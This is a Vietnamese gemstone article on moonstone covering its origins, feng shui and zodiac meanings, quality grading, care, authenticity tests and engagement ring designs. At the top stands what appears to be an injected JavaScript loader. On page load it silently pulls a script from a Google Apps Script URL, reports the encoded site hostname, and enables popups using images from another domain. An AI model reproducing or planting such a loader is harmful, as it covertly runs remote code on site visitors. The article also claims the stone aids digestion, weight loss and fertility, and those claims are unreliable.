var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Đá mặt trăng (Moonstone) là gì?

Đá mặt trăng đã làm say đắm trái tim của những người yêu trang sức trong nhiều thế kỷ. Với vẻ đẹp dịu dàng từ các vệt ánh sáng xanh mát chuyển động bắt mắt, đá moonstone luôn thu hút mọi ánh nhìn cho dùng bạn sử dụng đá mặt trăng để làm bất kỳ trang sức nào từ vòng đá mặt trăng, nhẫn đá mặt trăng, cho đến mặt dây chuyền.

Đá mặt trăng Moonstone thể hiện hiện tượng quang học được gọi là Adularescence. Ánh sáng di chuyển trên đá mặt trăng tạo cho chúng ta cảm giác giống như những ánh trăng đang lướt qua một vùng nước tĩnh lặng lớn. Điều này được tao ra khi ánh sáng phản xạ khỏi các lớp khoáng chất Fenspat mỏng ở bề mặt của đá mặt trăng (Moonstone). Các lớp Fenspat này đóng vai trò như một bộ khuếch tán, làm dịu ánh sáng và cho phép nó phản xạ xung quanh viên đá.

Đá mặt trăng (Moonstone) /ˈmün-ˌstōn/ là loại đá bán quý thuộc họ khoáng vật fenspat. Đá mặt trăng thông thường có màu trắng đục hoặc có màu như hồng đào, hồng, xanh lục, xám, vàng, nâu và xanh lam.

Những viên đá mặt trăng chất lượng cao thường được tìm thấy tại các mỏ đá mặt trăng ở Sri Lanka và Ấn Độ. Những viên đá mặt trăng màu xanh lam rất hiếm có chỉ có thể được tìm thấy ở Sri Lanka. Loại đá Mặt Trăng cầu vồng lại được tìm thấy từ nguồn đá quý độc đáo ở Ấn độ. Ngoài ra đá mặt trăng còn được tìm thấy ở Myanmar, Thụy sĩ, Brazil, Na Uy, Mỹ, Úc, Đức, Tanzania, Ấn Độ và Madagascar.

Tên khoa họcMoonstoneHọOrthoclaseCông thức hóa học(Na,K)AlSi3O8Thang đôMohs6/10Trọng lượng riêng2.61Phân bổ trên thế giớiArmenia, Úc, Áo, Mexico, Madagascar, Myanmar, Na Uy, Ba Lan, Ấn Độ, Sri Lanka và Hoa Kỳ.

đá mặt trăng

Ý nghĩa và tính năng của đá mặt trăng (Moonstone)

Lấp lánh và mờ ảo – hai vẻ đẹp đối lập của mặt trăng – đã tạo nên vẻ đẹp yên bình mà lại huyền bí và gợi cảm cho viên đá. Đá mặt trăng (Moonstone) lan tỏa sức sống rực rỡ mãnh liệt, ẩn chứa khả năng thanh lọc tâm hồn và cơ thể

Được bảo bọc bởi các tia sáng màu vàng, xanh lam và tím, đá mặt trăng luôn được bao quanh bởi năng lượng ánh sáng lấp lánh đầy màu sắc này, trở thành viên ngọc có năng lực bảo vệ và chấn an.

Đá mặt trăng được sử dụng như một mẫu vật bảo vệ khi đi du lịch vào ban đêm, đi trên biển, cho người phụ nữ trong giai đoạn mang thai và sinh con. Viên đá được tin là có thể sạch hệ tiêu hóa và giảm béo phì.

đá mặt trăng

Đá mặt trăng hợp mệnh gì?

Theo thuyết ngũ hành của người phương Đông, mỗi mệnh được đại diện bởi một loại màu sắc riêng. Đá mặt trăng mang ánh sáng trắng trong treo và tinh khiết và là biểu tượng của vũ trụ nên viên đá mang màu sắc đặc trưng cho mệnh Kim nên sẽ hỗ trợ nhiều cho người mang mệnh Kim và mệnh Thủy.

Xét theo khía cạnh cung hoàng đạo thì đá mặt trăng Moonstone hợp với: Cự Giải, Thiên Bình và Hổ Cáp

Khi nhìn nhận theo một góc độ khác từ người phương Tây, đá Moonstone là viên đá sinh thần của tháng 6, bên cạnh Ngọc trai và đá Alexandrite. Nếu bạn sinh vào tháng 6, đừng ngần ngại mà hãy chọn ngay cho mình món trang sức đá quý từ một trong ba loại đá trên nhé.

nhẫn đá mặt trăng

Ứng dụng Phong thủy của đá mặt trăng

Dưới đây là một số cách để sử dụng đá mặt trăng có lợi trong phong thủy nhà đất. Bạn cũng có thể luôn để viên đá bên mình bằng cách cho vào một túi nhỏ hoặc làm đồ trang sức và đặt ở các vị trí trong nhà như:

  • Gần giường hoặc dưới nệm (vị trí bụng dưới): đá mặt trăng tại khu vực này sẽ giúp bạn cải thiện các vấn đề khó sinh, nội tiết tố rối loạn và tăng khả năng sinh sản
  • Gần giường hoặc dưới nệm (vị trí trái tim): cân bằng hoặc tăng cảm xúc nữ tính, và tăng cường khả năng nhận thức và tiếp thu
  • Góc tình yêu và hôn nhân trong phòng ngủ: đá mặt trăng sẽ giúp bạn có được trí tuệ minh mẫn, biết chăm sóc bản thân và hỗ trợ cho một sức khỏe lành mạnh
  • Khu vực trung tâm trong ngôi nhà: đặt một mảnh đá mặt trăng tại đây sẽ tăng cường khả năng chữa bệnh của viên đá, giúp bạn có được sự cân bằng và giải tỏa căng thẳng.
  • Trong văn phòng hoặc không gian làm việc: Viên đá sẽ kích hoạt sự sáng tạo, đem lại các cơ hội hiếm có cho sự nghiệp của bạn

nhẫn đá mặt trăng

Yếu tố đánh giá chất lượng đá mặt trăng

Khi lựa chọn Đá mặt trăng Moonstone, người mua thường xem xét ba yếu tố chính: màu nền, màu sắc chung và hướng phản chiếu của ánh sáng.

Vẻ ngoài của Đá mặt trăng có dạng từ bán trong suốt đến mờ đục và từ không màu đến trắng pha xanh lam và bạc hoặc màu trắng sữa. Nhóm màu nền của đá mặt trăng rất đa dạng: như nhóm đá màu xanh lục, nhóm đá màu từ vàng đến nâu, hoặc nhóm đá màu từ xám đến gần đen. Một số viên đá mặt trăng còn có các tia sáng song song (còn được gọi là hiệu ứng mắt mèo). Một hiện tượng ánh sáng độc đáo khác thường thấy nữa là hiệu ứng nhóm sao (asterism) – viên đá xuất hiện ngôi sao nhiều nhánh.

Cũng giống như kim cương hoặc một số loại đá quý khác (sapphire, ruby, …), các chuyên gia đánh giá chất lượng đá mặt trăng căn cứ vào tiêu chuẩn 4C được thiết lập bởi tổ chức GIA: màu sắc, độ tinh khiết, giác cắt và trọng lượng.

Màu sắc đá mặt trăng (Color)

Trong suốt lịch sử lâu đời của mình, vẻ đẹp của đá mặt trăng đã được công nhận và được đánh giá cao nhất với các đặc điểm màu sắc sau: là một viên đá không màu, bán trong suốt đến gần như trong suốt mà không có tạp chất nhìn thấy được đi cùng với hiệu ứng lấp lánh như ánh trăng màu xanh lam sống động (còn được gọi là ánh dương).

Đá mặt trăng hoàn hảo có độ tinh khiết như thủy tinh với ánh sáng lấp lánh màu xanh sáng chói linh động.

đá mặt trăng cabonchon

Dưới ánh đèn, những viên đá mặt trăng cắt theo hình cabochon này có màu xanh lam tuyệt đẹp.

Màu nền của đá mặt trăng phải gần như không màu và không chứa ánh sắc vàng, nâu hoặc xanh lục kém hấp dẫn. Hiệu ứng lấp lánh ánh trăng lý tưởng nhất là ánh sắc màu lam.

Ánh sáng xanh của đá mặt trăng cần được tập trung ở phần trên cùng của viên đá để có thể được phản chiếu theo nhiều hướng khác nhau. Nếu hiệu ứng phản chiếu này chỉ hiển thị trong một phạm vi bị hạn chế, thì giá trị của viên đá sẽ giảm xuống.

Vào năm 1997, các thợ mỏ ở miền Nam Ấn Độ đã phát hiện ra một loại đá mặt trăng mới với màu nền là xanh lục tươi sáng, được giới buôn bán mô tả là màu xanh lông vẹt (parrot green) với hiệu ứng lấp lánh ánh trăng phản chiếu màu sắc xanh lục.

Đá mặt trăng cũng có tính đa sắc (Pleochroism), để chỉ các màu sắc khác nhau sẽ được thấy khi chúng ta quan sát viên đá ở các góc khác nhau.

màu sắc của đá mặt trăng

Đá mặt trăng ngày nay phổ biến là các màu sắc bao gồm các màu từ cam đến vàng.

Độ tinh khiết của đá mặt trăng (Clarity)

Một viên đá mặt trăng chất lượng tốt phải gần như trong suốt và càng có ít tạp chất càng tốt. Những tạp chất này có ảnh hưởng rất lớn đến hiệu ứng lấp lánh ánh trăng.

độ trong suốt của đá mặt trăng

Các tạp chất đặc trưng trong đá mặt trăng bao gồm các vết nứt căng nhỏ gọi là centipedes (rết).

Giác cắt củ đá mặt trăng (Cut)

Không giống như đa số loại đá quý khác được chế tác theo các kiểu cắt đa dạng, nhiều mặt cạnh, đá mặt trăng có thể được tạo hình thành các hạt tròn cho các chuỗi, nhưng kiểu cắt phổ biến nhất vẫn là kiểu cabochon – kiểu cắt này hiển thị tốt nhất màu sắc và hiệu ứng ánh trăng đặc trưng của đá.

Khi cắt theo hình cabochon, thì các kích thước phải đồng đều và mặt cắt không được quá phẳng. Kiểu cắt này sẽ làm tăng độ sáng cho đá mặt trăng Moonstone và có xu hướng che giấu tất cả các tạp chất nào có trong viên đá. Những viên đá moonstone phẳng không hiển thị ánh sáng tốt và có giá trị thấp.

Tuy đá mặt trăng cắt theo dạng cabochon thường có hình bầu dục, nhưng những người thợ kim hoàn đôi khi cũng tạo ra các hình dạng thú vị, chẳng hạn như dáng hình nón – một viên đá mặt trăng cabochon góc cạnh với đế hình vuông (tapered sugarloaf)

Đá Moonstone được sử dụng phổ biến để chạm khắc thành các trang sức có hình dạng độc đáo, chẳng hạn như khuôn mặt người đàn ông trên bề mặt viên đá được đính trên những chiếc nhẫn hoặc mặt dây chuyền. Bề mặt không đồng đều sau khi chạm khắc kết hợp với sự phản chiếu ánh sáng đã tạo ra một nét đẹp sống động mang hơi hướng bí ẩn của nghệ thuật trừu tượng.

Đá mặt trăng

Các hình dạng chế tác phổ biến của đá mặt trăng:

  1. Hình tròn
  2. Hình bầu dục
  3. Hình hộp chữ nhật
  4. Hình giọt lệ
  5. Hình tam giác

Trọng lượng (Carat)

Đá mặt trăng Moonstone được tìm thấy trong nhiều kích cỡ và trọng lượng carat khác nhau. Các tinh thể chất lượng cao có trọng lượng lớn đang trở nên khan hiếm. Vì hiếm có nên đá mặt trăng rất có giá trị khi viên đá có kích thước lớn.

Moonstone

Cách bảo quản đá mặt trăng

Đá mặt trăng có độ cứng từ 6 đến 6.5 trên thang điểm độ cứng Mohs. Vì vậy, chúng có độ bền trung bình, một cú đánh mạnh có thể làm vỡ đá mặt trăng. Viên đá thường được đặt vào các mặt dây chuyền, bông tai và ghim hơn là nhẫn (vì nhẫn có khả năng bị va đập hơn).

Để giữ viên đá mặt trăng luôn rực rỡ và chất lượng. bạn nên lưu ý:

  • Làm sạch viên đá thường xuyên: bạn chỉ cần dùng nước ấm (không nóng) với xà phòng nhẹ và sử dụng bàn chải lông mềm nếu cần thiết. Sau đó, bạn chỉ cần lau khô viên đá bằng khăn mềm
  • Sóng siêu âm và hơi nước không bao giờ nên dùng cho đá mặt trăng
  • Để tinh thể này dưới ánh trăng thường xuyên, đặc biệt vào lúc trăng tròn hoặc trăng non. Việc này không chỉ giúp bạn có thể chiêm ngưỡng được vẻ đẹp cộng hưởng độc đáo khi ánh trăng xuyên qua viên đá mà còn giúp chúng phục hồi và bổ sung năng lượng.

nhẫn đá mặt trăng moonstone

Một vài cách giúp bạn xác định viên đá mặt trăng (Moonstone) của bạn là đá tự nhiên hay không

  • Quan sát các lớp bên trong đá mặt trăng: đặt viên đá dưới ánh sáng, bạn có thể thấy cấu trúc phân lớp bên trong. Bạn sẽ chỉ nhìn thấy sự phân tách của các lớp này ở viên đá mặt trăng tự nhiên vì trong đá nhân tạo vì chúng sẽ bị mờ trong quá trình xử lý.

Đá mặt trăng tự nhiên sẽ có ánh xanh lam và quan trọng nhất là ánh ngũ sắc lấp lánh bên trong viên đá. Do đá mặt trăng không thể khúc xạ ánh sáng ở góc lớn hơn 15 độ, nên nếu một viên đá tỏa sáng ở tất cả các góc độ khác nhau thì đó không phải đá tự nhiên.

  • Ngâm viên đá mặt trăng của bạn trong nước từ 1-1,5 giờ. Nếu đá mặt trăng trở nên sáng hơn và màu sắc của nó tăng lên thì đó là đá tự nhiên.

Một viên đá thật chỉ nóng lên sau một thời gian dài, vì vậy nếu bạn giữ viên đá trên tay vẫn sẽ có cảm giác mát lạnh. Một viên đá giả làm bằng thủy tinh sẽ ngay lập tức trở nên ấm áp.

  • Quan sát độ tinh khiết: Nếu viên đá có cấu trúc bên trong hoàn hảo và giá không quá cao thì rất có thể đó là hàng giả hoặc đá nhân tạo. Đá tự nhiên thường có bong bóng và chứa vết nứt.

Hãy nhớ rằng mặc dù đôi khi bạn có thể tự mình xác định xem viên đá là thật hay không, nhưng để chắc chắn bạn nên tham khảo chuyên gia đá quý. Và tất nhiên, hãy nhớ rằng nên mua đá quý tại các địa điểm uy tín và có giấy chứng nhận chất lượng nhé.

6 mẫu nhẫn đá mặt trăng đẹp dành cho việc đính hôn

Trang sức đá mặt trăng Moonstone đã có từ rất lâu, tuy nhiên phải đến đầu những năm 1900s, những viên đá này mới trở thành một biểu tượng và là tâm điểm trong các thiết kế trang sức quan trọng. Trong những năm trước Kỷ nguyên Tân nghệ thuật, đá mặt trăng thường được sử dụng như một loại đá nhấn nhỏ.

Các nghệ nhân như René Lalique đã mang đến một sự thay đổi mạnh mẽ với Phong trào Tân nghệ thuật và Nghệ thuật và Thủ công mỹ nghệ. Đá phong thủy tự nhiên với vẻ đẹp huyền bí cùng niềm tin vào các đặc tính độc đáo trong thời kỳ này giúp chúng được ưa chuộng hơn các loại đá quý truyền thống như ruby, sapphire hay emerald. Thời kỳ Art Nouveau chỉ tồn tại trong thời gian ngắn và phong trào Art Deco đã sớm xuất hiện với sự chú trọng nhiều vào kim cương và các loại đá quý khác. Tuy nhiên mãi đến những năm 1960, đá mặt trăng moonstone mới thật sự trở lại với giới thời trang.

Nhẫn đá mặt trăng Lori từ nhà thiết kế Dinny Hall

nhẫn đính hôn đá mặt trăng

Chiếc nhẫn đính hôn Lori làm từ đá mặt trăng của Dinny Hall với ánh sáng xanh toàn thân đá. Mẫu nhẫn đính hôn này tuy đơn giản nhưng cũng không kém sự tinh tế và sự sang trọng. Ngoài ra, mẫu nhẫn đính hôn đá mặt trăng này cũng phù hợp để đeo hàng ngày mà vẫn thu hút mọi ánh nhìn.

Nhẫn ba mặt trăng với ánh cầu vồng rực rỡ từ nhà thiết kế Wanderlust

mẫu nhẫn đá mặt trăng

Nếu bạn theo đuổi một thứ gì đó độc đáo hơn một chút, thì thiết kế của chiếc nhẫn đá mặt trăng này của Wanderlust Jewellery là 1 sự lựa chọn tốt. Với một viên đá mặt trăng lớn và hai mặt trăng nhỏ mài dạng cabochon hình giọt các chi tiết xoáy trang trí công phu tạo nên sự khác biệt rõ ràng và thể hiện sự cá tính của người đeo.

Nhẫn Peach Moonstone, Đồ trang sức của nhà thiết kê Ahne

nhẫn peach moonstone

Đá mặt trăng không nhất thiết phải có màu trắng sữa, chúng cũng có màu hồng. Chiếc nhẫn mặt trăng màu PEACH này làm từ vàng 14k với bản đeo mỏng, rất lý tưởng để xếp cạnh nhẫn cưới hay dùng làm STACK RING.

Nhẫn đá mặt trăng hình cánh diều từ nhà thiết kế Ellie Air

nhẫn đá mặt trăng hình cánh diều

Chiếc nhẫn vĩnh cửu này có năm viên đá mặt trăng được cắt theo hình cánh diều tuyệt đẹp, uốn cong quanh ngón tay giúp chúng có thể lấp lánh ở mọi góc độ.

Nhẫn đá Moonstone với viền hào quang bằng kim cương từ Angara

nhẫn đá mặt trăng nạm kim cương

Lấy cảm hứng từ chiếc nhẫn đính hôn tuyệt đẹp của Công nương Diana, sản phẩm nhẫn đính hôn của Angara có đá chủ là viên đá mặt trăng hình bầu dục được bao quanh bởi vầng hào quang kim cương. Nhìn thật tuyệt phải không các bạn?

nhẫn đá mặt trăng đẹp

Thiết kế này từ công ty MoonMagic có hình mặt trăng cầu vồng với ánh lửa rất đẹp và được trang trí bằng sáu viên kim cương lấp lánh.

Các câu hỏi thường gặp về đá mặt trăng Moonstone